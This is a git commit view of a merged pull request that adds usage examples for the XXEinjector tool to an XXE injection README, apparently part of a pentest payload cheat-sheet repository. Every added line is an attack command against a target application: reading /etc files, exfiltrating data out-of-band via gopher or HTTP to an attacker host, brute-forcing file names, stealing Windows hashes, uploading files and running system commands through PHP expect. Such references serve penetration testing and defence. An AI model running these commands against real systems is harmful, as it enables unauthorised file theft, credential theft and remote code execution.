Merge pull request #114 from noraj/patch-1

XXE: add XXEinjector
2019-10-29 08:35:31 +01:00 · 2019-10-29 08:35:31 +01:00 · b25694239b
parent 5094ef8b10 52119907f6
commit b25694239b
1 changed files with 26 additions and 2 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -42,7 +42,31 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
   ```
   $ python3 230.py 2121
   ```
-   
+ - [XXEinjector](https://github.com/enjoiz/XXEinjector)
+   ```bash
+   # Enumerating /etc directory in HTTPS application:
+   ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
+   # Enumerating /etc directory using gopher for OOB method:
+   ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
+   # Second order exploitation:
+   ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
+   # Bruteforcing files using HTTP out of band method and netdoc protocol:
+   ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
+   # Enumerating using direct exploitation:
+   ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
+   # Enumerating unfiltered ports:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
+   # Stealing Windows hashes:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
+   # Uploading files using Java jar:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
+   # Executing system commands using PHP expect:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
+   # Testing for XSLT injection:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
+   # Log requests only:
+   ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
+   ```

 ## Detect the vulnerability